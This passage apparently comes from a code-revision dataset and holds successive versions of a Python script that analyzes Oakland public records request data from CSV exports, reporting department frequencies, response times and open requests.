+= ', '\n outs.write(line + '\\n')\n outs.close()\n\n\ndef rptDeptFreq(prrTbl, deptTbl, startDate, outf):\n outs = open(outf, 'w')\n outs.write('Dept,Freq\\n')\n for dept in sorted(deptTbl.keys()):\n nrecent = 0\n for prrIdx in deptTbl[dept]:\n prr = prrTbl[prrIdx]\n if prr['createDate'] >= startDate:\n nrecent += 1\n outs.write('%s,%d\\n' % (dept, nrecent))\n outs.close()\n\n\ndef rptOpenPRR(prrTbl, outf):\n daysOpen = defaultdict(lambda : defaultdict(list))\n runDate = datetime.datetime.today()\n for prrID in prrTbl.keys():\n prr = prrTbl[prrID]\n opdP = 'Police Department' in prr['dept']\n if prr['status'] == 'Open' or prr['status'] == 'Overdue' or prr[\n 'status'] == 'Due soon':\n recdDateTime = prr['createDate']\n openPeriod = runDate - recdDateTime\n openDays = openPeriod.days\n openYears = openDays // 365\n if openYears == 0:\n dkey = openDays\n else:\n dkey = 1000 + openYears\n daysOpen[opdP][dkey].append(prrID)\n outs = open(outf, 'w')\n outs.write('DaysOpen,NOPD,NOther,PRR-OPD,PRR-non\\n')\n allNDaySet = set(daysOpen[0].keys()).union(set(daysOpen[0].keys()))\n allNDay = sorted(list(allNDaySet))\n for nday in allNDay:\n if nday > 365:\n lbl = '> %d year' % (nday - 1000)\n else:\n lbl = '%d' % nday\n opdList = daysOpen[1][nday] if nday in daysOpen[1] else []\n nonList = daysOpen[0][nday] if nday in daysOpen[0] else []\n outs.write('%s,%d,%d,\"%s\",\"%s\"\\n' % (lbl, len(opdList), len(nonList\n ), opdList, nonList))\n outs.close()\n\n\ndef getWebPages(prrTbl, outf):\n outs = open(outf, 'w')\n outs.write('PRRID,OPD,Text\\n')\n nempty = 0\n npdf = 0\n for i, prrID in enumerate(sorted(prrTbl.keys())):\n prr = prrTbl[prrID]\n if prr['URL'] == '':\n nempty += 1\n continue\n opdP = 'Police Department' in prr['dept']\n url = prr['URL']\n response = urllib.request.urlopen(url)\n webContentBytes = response.read()\n webContent = webContentBytes.decode('utf-8')\n if webContent.find('pdf') != -1:\n print('here')\n npdf += 1\n else:\n continue\n if i % 100 == 0:\n 
print(i, npdf, nempty)\n outs.close()\n print('prr20-text: NPRR=%d NEmpty=%d' % (len(prrTbl), nempty))\n\n\ndef loadPRRQuery(inf):\n reader = csv.DictReader(open(inf))\n prrIDList = []\n for i, entry in enumerate(reader):\n prrIDList.append(entry['PRRId'].strip())\n return prrIDList\n\n\ndef rptQry(qryList, outf):\n outs = open(outf, 'w')\n outs.write('PRID,CreateDate,DaysOpen,Status\\n')\n runDate = datetime.datetime.today()\n for prrID in qryList:\n prr = prr20Recent[prrID]\n recdDateTime = prr['createDate']\n openPeriod = runDate - recdDateTime\n openDays = openPeriod.days\n outs.write('%s,%s,%d,%s\\n' % (prrID, prr['createDate'].date(),\n openDays, prr['status']))\n outs.close()\n\n\nif __name__ == '__main__':\n dataDir = '/Users/rik/Data/c4a-Data/OAK_data/recordTrac/'\n startDate = datetime.datetime(2017, 1, 1)\n csvFile = dataDir + 'requests-2020-07-01-sdoran.csv'\n prr20Recent, deptTbl = bldIndexTblCSV(csvFile, startDate)\n openPRRFile = dataDir + 'openPRR_200831.csv'\n rptOpenPRR(prr20Recent, openPRRFile)\n deptFreqFile = dataDir + 'deptFreq2.csv'\n rptDeptFreq(prr20Recent, deptTbl, startDate, deptFreqFile)\n createDateFile = dataDir + 'createDate_200831.csv'\n anlyzCreateDates(prr20Recent, createDateFile)\n clearDateDir = dataDir + 'deptClear_200831/'\n anlyzClearDates(prr20Recent, deptTbl, startDate, clearDateDir)\n openOPDFile = dataDir + 'openOPD_200831.csv'\n rptOpenPRR(prr20Recent, openOPDFile)\n", "step-4": "<mask token>\nPRRDateFmt = '%Y-%m-%dT%H:%M:%S'\nPRRDateMicroSecFmt = '%Y-%m-%dT%H:%M:%S.%f'\nDateTypes = {'date_received': 'recdDate', 'date_created': 'createDate',\n 'status_updated': 'statusUpDate'}\n\n\ndef freqHist3(tbl):\n \"\"\"python3 version\n\tASSUME: values are frequencies, returns sorted list of (val,freq) items in descending freq order\n\t\"\"\"\n from functools import cmp_to_key\n\n def cmpd1(a, b):\n \"\"\"decreasing order of frequencies\"\"\"\n return b[1] - a[1]\n flist = list(tbl.items())\n flist.sort(key=cmp_to_key(cmpd1))\n 
return flist\n\n\nAllCSVHeader = ['Id', 'Created At', 'Request Text', 'Due Date',\n 'Point of Contact', 'Request Date', 'Status', 'URL', 'Visibility',\n 'Closed Date', 'Closure Reasons', 'Departments', 'Format Received',\n 'Staff Time (hrs:minutes)', 'Staff Time (minutes)', 'Tags',\n 'Embargo Ends On Date', 'Staff Cost', 'Date First Contact',\n 'First Contact Event', 'Compliance', 'Anticipated Fulfillment Date',\n 'Expiration Date', 'Requester City', 'Requester State',\n 'Requester Zipcode', 'Requester Company']\nDeptNorm = {'Admin: Planning, Building & Neighborhood Preserv':\n 'Admin: Building Inspection', 'Budget and Fiscal':\n 'Budget and Revenue - Revenue Division',\n 'City Attorney Administration Unit': 'City Attorney',\n 'City Auditor Unit': 'City Auditor', 'City Clerk Unit': 'City Clerk',\n 'Oakland Police Department': 'Police Department',\n 'Contracts and Compliance': 'Contracts Compliance',\n 'Transportation Services - Administration':\n 'Department of Transportation', 'Fire': 'Fire Department',\n 'Human Resources Management': 'Human Resources',\n 'Information Technology (IT)': 'Information Technology',\n 'Public Works Agency': 'Public Works'}\nCSVDTFormat = '%m/%d/%Y %H:%M:%S %p'\n\n\ndef bldIndexTblCSV(inf, startDate=None):\n \"\"\"return prrIDTbl, deptTbl\n\t\"\"\"\n prrTbl = {}\n deptTbl = defaultdict(list)\n statusTbl = defaultdict(int)\n ncloseDate = 0\n nolder = 0\n nmultDept = 0\n deptSepChar = b'\\xef\\xbf\\xbd'\n reader = csv.DictReader(open(inf, encoding='utf8', errors='replace'))\n for i, entry in enumerate(reader):\n prr = {}\n prrID = entry['Id']\n createDateStr = entry['Created At'].strip()\n prr['createDate'] = datetime.datetime.strptime(createDateStr,\n CSVDTFormat) if createDateStr != '' else None\n if prr['createDate'] == None or startDate != None and prr['createDate'\n ] < startDate:\n nolder += 1\n continue\n deptStr = entry['Departments'].strip()\n if deptStr.find(';') == -1:\n deptList = [deptStr]\n else:\n nmultDept += 1\n deptList 
= [dept.strip() for dept in deptStr.split(';')]\n deptList2 = []\n for dept in deptList:\n ndept = DeptNorm[dept] if dept in DeptNorm else dept\n if ndept != '':\n deptList2.append(ndept)\n deptTbl[ndept].append(prrID)\n prr['dept'] = deptList2\n closeDateStr = entry['Closed Date'].strip()\n prr['closeDate'] = datetime.datetime.strptime(closeDateStr, CSVDTFormat\n ) if closeDateStr != '' else None\n prr['status'] = entry['Status'].strip()\n prr['text'] = entry['Request Text'].strip()\n prr['closeReason'] = entry['Closure Reasons'].strip()\n prr['URL'] = entry['URL'].strip()\n statusTbl[prr['status']] += 1\n if prr['closeDate'] != None:\n ncloseDate += 1\n prrTbl[prrID] = prr\n print('bldIndexTblCSV: NPRR=%d NDept=%d NMultDept=%d NCloseDate=%d' % (\n len(prrTbl), len(deptTbl), nmultDept, ncloseDate))\n if startDate != None:\n print('bldIndexTblCSV: NOld dropped=%d' % nolder)\n freqList = freqHist3(statusTbl)\n print('Status,Freq')\n for status, freq in freqList:\n print('\"%s\",%d' % (status, freq))\n return prrTbl, deptTbl\n\n\ndef compHistAvg(hist):\n \"\"\"compute first moment\n\tASSUME hist: value -> freq \n\t\"\"\"\n sum = n = 0\n for v in hist.keys():\n n += hist[v]\n sum += v * hist[v]\n return n, float(sum) / n\n\n\ndef compMedian(hist):\n \"\"\"compute MEDIAN value\n\tASSUME hist: value -> freq \n\t\"\"\"\n if len(hist) == 1:\n return hist[0]\n sum = n = 0\n vn = {}\n for v in sorted(hist.keys()):\n n += hist[v]\n sum += v * hist[v]\n vn[v] = n\n half = float(n / 2.0)\n for v in sorted(hist.keys()):\n if vn[v] > half:\n return v\n\n\ndef anlyzCreateDates(prrIDTbl, outf):\n \"\"\"distribution of create dates\n\t\"\"\"\n dateDist = defaultdict(int)\n nmissdate = 0\n for prrID, prr in prrIDTbl.items():\n cdateFnd = prr['createDate']\n if cdateFnd == None:\n nmissdate += 1\n continue\n mkey = '%d-%02d' % (cdateFnd.year, cdateFnd.month)\n dateDist[mkey] += 1\n print('anlyzCreateDates: NPRR=%d NBadDate=%d' % (len(prrIDTbl), nmissdate))\n allMon = 
list(dateDist.keys())\n allMon.sort()\n outs = open(outf, 'w')\n outs.write('Month,Freq\\n')\n for mkey in allMon:\n outs.write('%s,%d\\n' % (mkey, dateDist[mkey]))\n outs.close()\n\n\ndef normDeptName(dept):\n return re.sub('\\\\W', '_', dept.upper())\n\n\ndef anlyzClearDates(prrIDTbl, deptTbl, startDate, outdir, minDeptFreq=10):\n \"\"\"Compute average (over previous 90 days) number of days to respond to request\n\t\t\t\tNumber requests open at month start\n\t\"\"\"\n allDept = [dept for dept in deptTbl.keys() if len(deptTbl[dept]) >\n minDeptFreq]\n allDept.sort()\n nonOPDresp = defaultdict(lambda : defaultdict(int))\n nonOPDopen = defaultdict(int)\n print('\\n# Dept,NOld,NMissRecd,NMissClose')\n missCloseDetails = defaultdict(lambda : defaultdict(list))\n for dept in allDept:\n responseMon = defaultdict(lambda : defaultdict(int))\n openReqMon = defaultdict(int)\n nmissRecd = 0\n nmissClose = 0\n nolder = 0\n for prrID in deptTbl[dept]:\n prr = prrIDTbl[prrID]\n recdDateTime = prr['createDate']\n if recdDateTime == None:\n nmissRecd += 1\n continue\n if recdDateTime < startDate:\n nolder += 1\n continue\n try:\n recdMonKey = '%d-%02d' % (recdDateTime.year, recdDateTime.month\n )\n except Exception as e:\n print('huh')\n if prr['status'] == 'Closed':\n closeDate = prr['closeDate']\n if closeDate == None:\n nmissClose += 1\n missCloseDetails[dept][recdMonKey].append(prrID)\n continue\n respDelay = closeDate - recdDateTime\n delayDays = respDelay.days\n responseMon[recdMonKey][delayDays] += 1\n if dept != 'Police Department':\n nonOPDresp[recdMonKey][delayDays] += 1\n else:\n openReqMon[recdMonKey] += 1\n if dept != 'Police Department':\n nonOPDopen[recdMonKey] += 1\n print('\"%s\",%d,%d,%d' % (dept, nolder, nmissRecd, nmissClose))\n allMonth = list(responseMon.keys())\n allMonth.sort()\n normDept = normDeptName(dept)\n outf = outdir + normDept + '-RT.csv'\n outs = open(outf, 'w')\n outs.write('Month,NClose,NOpen,Avg,Median\\n')\n for recdMonKey in allMonth:\n 
nreq, avgDelay = compHistAvg(responseMon[recdMonKey])\n medianDelay = compMedian(responseMon[recdMonKey])\n outs.write('%s,%d,%d,%f,%d\\n' % (recdMonKey, nreq, openReqMon[\n recdMonKey], avgDelay, medianDelay))\n outs.close()\n allMonth = list(nonOPDresp.keys())\n allMonth.sort()\n outf = outdir + 'NonOPD-RT.csv'\n outs = open(outf, 'w')\n outs.write('Month,N,NOPen,Avg,Median\\n')\n for recdMonKey in allMonth:\n nreq, avgDelay = compHistAvg(nonOPDresp[recdMonKey])\n medianDelay = compMedian(nonOPDresp[recdMonKey])\n outs.write('%s,%d,%d,%f,%d\\n' % (recdMonKey, nreq, nonOPDopen[\n recdMonKey], avgDelay, medianDelay))\n outs.close()\n outf = outdir + 'missClose.csv'\n outs = open(outf, 'w')\n allDateSet = set()\n for dept in missCloseDetails.keys():\n allDateSet.update(missCloseDetails[dept].keys())\n allDates = sorted(list(allDateSet))\n hdr = 'Dept'\n for date in allDates:\n hdr += ',%s' % (date,)\n outs.write(hdr + '\\n')\n for dept in sorted(missCloseDetails.keys()):\n line = dept\n for date in allDates:\n if date in missCloseDetails[dept]:\n line += ',%d' % (len(missCloseDetails[dept][date]),)\n else:\n line += ', '\n outs.write(line + '\\n')\n outs.close()\n\n\ndef rptDeptFreq(prrTbl, deptTbl, startDate, outf):\n outs = open(outf, 'w')\n outs.write('Dept,Freq\\n')\n for dept in sorted(deptTbl.keys()):\n nrecent = 0\n for prrIdx in deptTbl[dept]:\n prr = prrTbl[prrIdx]\n if prr['createDate'] >= startDate:\n nrecent += 1\n outs.write('%s,%d\\n' % (dept, nrecent))\n outs.close()\n\n\ndef rptOpenPRR(prrTbl, outf):\n daysOpen = defaultdict(lambda : defaultdict(list))\n runDate = datetime.datetime.today()\n for prrID in prrTbl.keys():\n prr = prrTbl[prrID]\n opdP = 'Police Department' in prr['dept']\n if prr['status'] == 'Open' or prr['status'] == 'Overdue' or prr[\n 'status'] == 'Due soon':\n recdDateTime = prr['createDate']\n openPeriod = runDate - recdDateTime\n openDays = openPeriod.days\n openYears = openDays // 365\n if openYears == 0:\n dkey = openDays\n 
else:\n dkey = 1000 + openYears\n daysOpen[opdP][dkey].append(prrID)\n outs = open(outf, 'w')\n outs.write('DaysOpen,NOPD,NOther,PRR-OPD,PRR-non\\n')\n allNDaySet = set(daysOpen[0].keys()).union(set(daysOpen[0].keys()))\n allNDay = sorted(list(allNDaySet))\n for nday in allNDay:\n if nday > 365:\n lbl = '> %d year' % (nday - 1000)\n else:\n lbl = '%d' % nday\n opdList = daysOpen[1][nday] if nday in daysOpen[1] else []\n nonList = daysOpen[0][nday] if nday in daysOpen[0] else []\n outs.write('%s,%d,%d,\"%s\",\"%s\"\\n' % (lbl, len(opdList), len(nonList\n ), opdList, nonList))\n outs.close()\n\n\ndef getWebPages(prrTbl, outf):\n outs = open(outf, 'w')\n outs.write('PRRID,OPD,Text\\n')\n nempty = 0\n npdf = 0\n for i, prrID in enumerate(sorted(prrTbl.keys())):\n prr = prrTbl[prrID]\n if prr['URL'] == '':\n nempty += 1\n continue\n opdP = 'Police Department' in prr['dept']\n url = prr['URL']\n response = urllib.request.urlopen(url)\n webContentBytes = response.read()\n webContent = webContentBytes.decode('utf-8')\n if webContent.find('pdf') != -1:\n print('here')\n npdf += 1\n else:\n continue\n if i % 100 == 0:\n print(i, npdf, nempty)\n outs.close()\n print('prr20-text: NPRR=%d NEmpty=%d' % (len(prrTbl), nempty))\n\n\ndef loadPRRQuery(inf):\n reader = csv.DictReader(open(inf))\n prrIDList = []\n for i, entry in enumerate(reader):\n prrIDList.append(entry['PRRId'].strip())\n return prrIDList\n\n\ndef rptQry(qryList, outf):\n outs = open(outf, 'w')\n outs.write('PRID,CreateDate,DaysOpen,Status\\n')\n runDate = datetime.datetime.today()\n for prrID in qryList:\n prr = prr20Recent[prrID]\n recdDateTime = prr['createDate']\n openPeriod = runDate - recdDateTime\n openDays = openPeriod.days\n outs.write('%s,%s,%d,%s\\n' % (prrID, prr['createDate'].date(),\n openDays, prr['status']))\n outs.close()\n\n\nif __name__ == '__main__':\n dataDir = '/Users/rik/Data/c4a-Data/OAK_data/recordTrac/'\n startDate = datetime.datetime(2017, 1, 1)\n csvFile = dataDir + 
'requests-2020-07-01-sdoran.csv'\n prr20Recent, deptTbl = bldIndexTblCSV(csvFile, startDate)\n openPRRFile = dataDir + 'openPRR_200831.csv'\n rptOpenPRR(prr20Recent, openPRRFile)\n deptFreqFile = dataDir + 'deptFreq2.csv'\n rptDeptFreq(prr20Recent, deptTbl, startDate, deptFreqFile)\n createDateFile = dataDir + 'createDate_200831.csv'\n anlyzCreateDates(prr20Recent, createDateFile)\n clearDateDir = dataDir + 'deptClear_200831/'\n anlyzClearDates(prr20Recent, deptTbl, startDate, clearDateDir)\n openOPDFile = dataDir + 'openOPD_200831.csv'\n rptOpenPRR(prr20Recent, openOPDFile)\n", "step-5": "'''harvestPRR: analyze Public Record Requests from CSV data provided by NextRequest\n\nCreated 27 Aug 20\n\n@author: rik@electronicArtifacts.com\n'''\n\nfrom collections import defaultdict\nimport csv\nimport datetime\nimport json\nimport random\nimport re\nimport requests\nimport sys\nimport time\nimport urllib\n\nimport re\n\n\nPRRDateFmt = '%Y-%m-%dT%H:%M:%S'\nPRRDateMicroSecFmt = '%Y-%m-%dT%H:%M:%S.%f'\n\nDateTypes = {'date_received': 'recdDate',\n\t\t\t'date_created': 'createDate',\n\t\t\t'status_updated': 'statusUpDate'}\n\ndef freqHist3(tbl):\n\t'''python3 version\n\tASSUME: values are frequencies, returns sorted list of (val,freq) items in descending freq order\n\t'''\n\t\n\tfrom functools import cmp_to_key\n\tdef cmpd1(a,b):\n\t\t\"decreasing order of frequencies\"\n\t\treturn b[1] - a[1]\n\n\t\n\tflist = list(tbl.items()) #python3\n\tflist.sort(key=cmp_to_key(cmpd1))\n\treturn flist\n\nAllCSVHeader = ['Id', 'Created At', 'Request Text', 'Due Date', 'Point of Contact', 'Request Date',\n\t\t\t'Status', 'URL', 'Visibility', 'Closed Date', 'Closure Reasons',\n\t\t\t'Departments', 'Format Received', 'Staff Time (hrs:minutes)',\n\t\t\t'Staff Time (minutes)', 'Tags', 'Embargo Ends On Date',\n\t\t\t'Staff Cost', 'Date First Contact', 'First Contact Event',\n\t\t\t'Compliance', 'Anticipated Fulfillment Date', 'Expiration Date',\n\t\t\t'Requester City', 'Requester State', 
'Requester Zipcode', 'Requester Company']\n\nDeptNorm = {\"Admin: Planning, Building & Neighborhood Preserv\": \"Admin: Building Inspection\",\n\t\t\t\"Budget and Fiscal\": \"Budget and Revenue - Revenue Division\",\n\t\t\t\"City Attorney Administration Unit\": \"City Attorney\",\n\t\t\t\"City Auditor Unit\": \"City Auditor\",\n\t\t\t\"City Clerk Unit\": \"City Clerk\",\n\t\t\t\"Oakland Police Department\": \"Police Department\",\n\t\t\t\"Contracts and Compliance\": \"Contracts Compliance\",\n\t\t\t\"Transportation Services - Administration\": \"Department of Transportation\",\n\t\t\t\"Fire\": \"Fire Department\",\n\t\t\t\"Human Resources Management\": \"Human Resources\",\n\t\t\t\"Information Technology (IT)\": \"Information Technology\",\n\t\t\t\"Public Works Agency\": \"Public Works\"}\n\nCSVDTFormat = '%m/%d/%Y %H:%M:%S %p'\n# 07/01/2020 09:54:53 AM\n\ndef bldIndexTblCSV(inf,startDate=None):\n\t'''return prrIDTbl, deptTbl\n\t'''\n\n\tprrTbl = {}\n\tdeptTbl = defaultdict(list) # keep list of all prrIDs\n\tstatusTbl = defaultdict(int)\n\tncloseDate = 0\n\tnolder = 0\n\tnmultDept = 0\n\tdeptSepChar = b'\\xef\\xbf\\xbd' # only used in Finance\n\t\n\treader = csv.DictReader(open(inf,encoding = \"utf8\",errors='replace'))\n\tfor i,entry in enumerate(reader):\n\t\tprr = {}\n\t\tprrID = entry['Id']\n\t\t\n\t\tcreateDateStr = entry['Created At'].strip()\n\t\tprr['createDate'] = datetime.datetime.strptime(createDateStr,CSVDTFormat) if createDateStr != '' else None\n\n\t\tif prr['createDate'] == None or \\\n\t\t\t(startDate != None and prr['createDate'] < startDate):\n\t\t\tnolder += 1\n\t\t\tcontinue\n\t\t\n\t\tdeptStr = entry['Departments'].strip()\n\t\t# NB: multiple department separated by semi-colon\n\t\tif deptStr.find(';') == -1:\n\t\t\tdeptList = [deptStr]\n\t\telse:\n\t\t\tnmultDept += 1\n\t\t\tdeptList = [dept.strip() for dept in deptStr.split(';')]\n\t\t\t\n\t\tdeptList2 = []\n\t\tfor dept in deptList:\n\t\t\tndept = DeptNorm[dept] if dept in DeptNorm else 
dept\n\t\t\tif ndept != '':\n\t\t\t\tdeptList2.append(ndept)\n\t\t\t\tdeptTbl[ndept].append(prrID)\n\t\tprr['dept'] = deptList2\n\t\t\t\n\t\tcloseDateStr = entry['Closed Date'].strip()\n\t\tprr['closeDate'] = datetime.datetime.strptime(closeDateStr,CSVDTFormat) if closeDateStr != '' else None\n\t\tprr['status'] = entry['Status'].strip()\n\t\tprr['text'] = entry['Request Text'].strip()\n\t\tprr['closeReason'] = entry['Closure Reasons'].strip()\n\t\tprr['URL'] = entry['URL'].strip()\n\t\t\n\t\t\n\t\tstatusTbl[ prr['status'] ] += 1\n\t\tif prr['closeDate'] != None:\n\t\t\tncloseDate += 1\n\t\t\t\n\t\tprrTbl[prrID] = prr\n\t\t\n\tprint('bldIndexTblCSV: NPRR=%d NDept=%d NMultDept=%d NCloseDate=%d' % \\\n\t\t(len(prrTbl),len(deptTbl),nmultDept,ncloseDate))\n\tif startDate != None:\n\t\tprint('bldIndexTblCSV: NOld dropped=%d' % (nolder))\n\n# \tfreqList = freqHist3(deptTbl)\n# \tprint('Dept,Freq')\n# \tfor dept,freq in freqList:\n# \t\tprint('\"%s\",%d' % (dept,freq))\n\n\tfreqList = freqHist3(statusTbl)\n\tprint('Status,Freq')\n\tfor status,freq in freqList:\n\t\tprint('\"%s\",%d' % (status,freq))\n\t\n\t\n\treturn (prrTbl, deptTbl)\n\t\t\ndef compHistAvg(hist):\n\t'''compute first moment\n\tASSUME hist: value -> freq \n\t'''\n\tsum = n = 0\n\tfor v in hist.keys():\n\t\tn += hist[v]\n\t\tsum += v * hist[v]\n\t\t\n\treturn n,float(sum) / n\n\ndef compMedian(hist):\n\t'''compute MEDIAN value\n\tASSUME hist: value -> freq \n\t'''\n\n\t# only singletons thwart the search for half-way point\n\tif len(hist) == 1:\n\t\treturn hist[0]\n\t\n\tsum = n = 0\n\tvn = {}\n\tfor v in sorted(hist.keys()):\n\t\tn += hist[v]\n\t\tsum += v * hist[v]\n\t\tvn[v] = n\n\t\t\n\thalf = float(n/2.)\n\tfor v in sorted(hist.keys()):\n\t\tif vn[v] > half:\n\t\t\treturn v\t\n\ndef anlyzCreateDates(prrIDTbl,outf):\n\t'''distribution of create dates\n\t'''\n\t\n\tdateDist = defaultdict(int)\n\tnmissdate = 0\n\tfor prrID,prr in prrIDTbl.items():\n\t\t# 180204\n# \t\tfor dtype in DateTypes.values():\n# 
\t\t\tif dtype in prr:\n# \t\t\t\tif cdateFnd == None:\n# \t\t\t\t\tcdateFnd = prr[dtype]\n# \t\t\t\telse:\n# \t\t\t\t\tif prr[dtype] != cdateFnd:\n# \t\t\t\t\t\tcdateFnd = min([cdateFnd,prr[dtype]])\n\n\t\tcdateFnd = prr['createDate']\n\t\t\t\t\t\t\n\t\tif cdateFnd== None:\n\t\t\tnmissdate += 1\n\t\t\tcontinue\n\t\tmkey = '%d-%02d' % (cdateFnd.year, cdateFnd.month)\n\t\tdateDist[mkey] += 1\n\t\t\n\tprint('anlyzCreateDates: NPRR=%d NBadDate=%d' % (len(prrIDTbl),nmissdate))\n\tallMon = list(dateDist.keys())\n\tallMon.sort()\n\touts = open(outf,'w')\n\touts.write('Month,Freq\\n')\n\tfor mkey in allMon:\n\t\touts.write('%s,%d\\n' % (mkey,dateDist[mkey]))\n\touts.close()\t\t\n\ndef normDeptName(dept):\n\treturn re.sub('\\W','_',dept.upper())\n\t\ndef anlyzClearDates(prrIDTbl,deptTbl,startDate,outdir,minDeptFreq=10):\n\t'''Compute average (over previous 90 days) number of days to respond to request\n\t\t\t\tNumber requests open at month start\n\t'''\n\t\n\tallDept = [dept for dept in deptTbl.keys() if len(deptTbl[dept]) > minDeptFreq ]\n\tallDept.sort()\n\n\tnonOPDresp = defaultdict(lambda: defaultdict(int)) # month -> ndays -> freq\n\tnonOPDopen = defaultdict(int) # month -> freq\n\t\n\tprint('\\n# Dept,NOld,NMissRecd,NMissClose')\n\tmissCloseDetails = defaultdict(lambda: defaultdict(list)) # dept -> recd -> [prrID]\n\t\n\tfor dept in allDept:\n\t\tresponseMon = defaultdict(lambda: defaultdict(int)) # month -> ndays -> freq\n\t\topenReqMon = defaultdict(int) # month -> freq\n\t\t\n\t\tnmissRecd = 0\n\t\tnmissClose = 0\n\t\tnolder = 0\n\t\tfor prrID in deptTbl[dept]:\n\t\t\tprr = prrIDTbl[prrID]\n\t\t\t# 180228\n\t\t\t# recdDateTime = prr['recdDate']\n\t\t\trecdDateTime = prr['createDate']\n\n\t\t\tif recdDateTime==None:\n\t\t\t\tnmissRecd += 1\n\t\t\t\tcontinue\n\t\t\t\n\t\t\tif recdDateTime < startDate:\n\t\t\t\tnolder += 1\n\t\t\t\tcontinue\n\t\t\ttry:\n\t\t\t\trecdMonKey = '%d-%02d' % (recdDateTime.year, recdDateTime.month)\n\t\t\texcept Exception as 
e:\n\t\t\t\tprint('huh')\n\t\t\n\t\t\tif prr['status'] == 'Closed':\n\t\t\t\t# 180228\n\t\t\t\t# closeDate = prr['statusUpDate']\n\t\t\t\tcloseDate = prr['closeDate']\n\t\t\t\tif closeDate==None:\n\t\t\t\t\tnmissClose += 1\n\t\t\t\t\tmissCloseDetails[dept][recdMonKey].append(prrID)\n\t\t\t\t\tcontinue\n\n\t\t\t\trespDelay = closeDate - recdDateTime\n\t\t\t\tdelayDays = respDelay.days\n\t\t\t\tresponseMon[recdMonKey][delayDays] += 1\n\t\t\t\t\n\t\t\t\t# NB: was 'Oakland Police Deparment' in 180204\n\t\t\t\tif dept != 'Police Department':\n\t\t\t\t\tnonOPDresp[recdMonKey][delayDays] += 1\n\t\t\t\n\t\t\telse:\n\t\t\t\topenReqMon[recdMonKey] += 1\n\t\t\n\t\t\t\t# NB: was 'Oakland Police Deparment' in 180204\n\t\t\t\tif dept != 'Police Department':\n\t\t\t\t\tnonOPDopen[recdMonKey] += 1\n\t\t\n\t\tprint('\"%s\",%d,%d,%d' % (dept,nolder,nmissRecd,nmissClose))\n\t\t\t\t\n\t\tallMonth = list(responseMon.keys())\n\t\tallMonth.sort()\n\t\t\n\t\tnormDept = normDeptName(dept)\n\t\t\n\t\toutf = outdir + normDept + '-RT.csv'\n\t\touts = open(outf,'w')\t\t\n\t\touts.write('Month,NClose,NOpen,Avg,Median\\n')\n\t\tfor recdMonKey in allMonth:\n\t\t\tnreq,avgDelay = compHistAvg(responseMon[recdMonKey])\n\t\t\tmedianDelay = compMedian(responseMon[recdMonKey])\n\t\t\touts.write('%s,%d,%d,%f,%d\\n' % (recdMonKey,nreq,openReqMon[recdMonKey],avgDelay,medianDelay))\n\t\touts.close()\n\t\t\n# \t\toutf = outdir + normDept + '-nopen.csv'\n# \t\touts = open(outf,'w')\t\t\n# \t\touts.write('Month,NOpen\\n')\n# \t\tfor recdMonKey in allMonth:\n# \t\t\touts.write('%s,%d\\n' % (recdMonKey,openReqMon[recdMonKey]))\n# \t\touts.close()\n\t\t\n\tallMonth = list(nonOPDresp.keys())\n\tallMonth.sort()\n\n\toutf = outdir + 'NonOPD-RT.csv'\n\touts = open(outf,'w')\t\t\n\t\n\touts.write('Month,N,NOPen,Avg,Median\\n')\n\tfor recdMonKey in allMonth:\n\t\tnreq,avgDelay = compHistAvg(nonOPDresp[recdMonKey])\n\t\tmedianDelay = compMedian(nonOPDresp[recdMonKey])\n\t\touts.write('%s,%d,%d,%f,%d\\n' % 
(recdMonKey,nreq,nonOPDopen[recdMonKey],avgDelay,medianDelay))\n\touts.close()\n\t\n# \toutf = outdir + 'NonOPD-NOpen.csv'\n# \touts = open(outf,'w')\t\t\n# \touts.write('Month,NOpen\\n')\n# \tfor recdMonKey in allMonth:\n# \t\touts.write('%s,%d\\n' % (recdMonKey,nonOPDopen[recdMonKey]))\n# \touts.close()\n\t\n\toutf = outdir + 'missClose.csv'\n\touts = open(outf,'w')\n\t# missCloseDetails: dept -> recd -> freq\n\t\n\tallDateSet = set()\n\tfor dept in missCloseDetails.keys():\n\t\tallDateSet.update(missCloseDetails[dept].keys())\n\tallDates = sorted(list(allDateSet))\n\t\n\thdr = 'Dept'\n\tfor date in allDates:\n\t\thdr += ',%s' % (date,)\n\touts.write(hdr+'\\n')\n\t\n\tfor dept in sorted(missCloseDetails.keys()):\n\t\tline = dept\n\t\tfor date in allDates:\n\t\t\tif date in missCloseDetails[dept]:\n\t\t\t\tline += ',%d' % (len(missCloseDetails[dept][date]),)\n\t\t\telse:\n\t\t\t\tline += ', '\n\t\touts.write(line+'\\n')\n\touts.close()\n\t\n\t\t\ndef rptDeptFreq(prrTbl, deptTbl,startDate,outf):\n\t\n\t# freq = defaultdict(int)\n\touts = open(outf,'w')\n\touts.write('Dept,Freq\\n')\n\t\n\tfor dept in sorted(deptTbl.keys()):\n\t\tnrecent = 0\n\t\tfor prrIdx in deptTbl[dept]:\n\t\t\tprr = prrTbl[prrIdx]\n\t\t\tif prr['createDate'] >= startDate:\n\t\t\t\tnrecent += 1\n\t\touts.write('%s,%d\\n' % (dept,nrecent))\n\t\n\touts.close()\n\ndef rptOpenPRR(prrTbl,outf):\n\t\n\tdaysOpen = defaultdict(lambda: defaultdict(list)) # ndays -> OPD/non -> [prrID]\n\trunDate = datetime.datetime.today()\n\t\n\tfor prrID in prrTbl.keys():\n\t\tprr = prrTbl[prrID]\n\t\topdP = 'Police Department' in prr['dept']\n\n\t\tif prr['status'] == 'Open' or prr['status'] == 'Overdue' or prr['status'] == 'Due soon':\n\t\t\trecdDateTime = prr['createDate']\n\t\t\topenPeriod = runDate - recdDateTime\n\t\t\topenDays = openPeriod.days\n\t\t\t# NB: capture integer dividend\n\t\t\topenYears = openDays // 365\n\t\t\tif openYears == 0:\n\t\t\t\tdkey = openDays\n\t\t\telse:\n\t\t\t\tdkey = 1000 + 
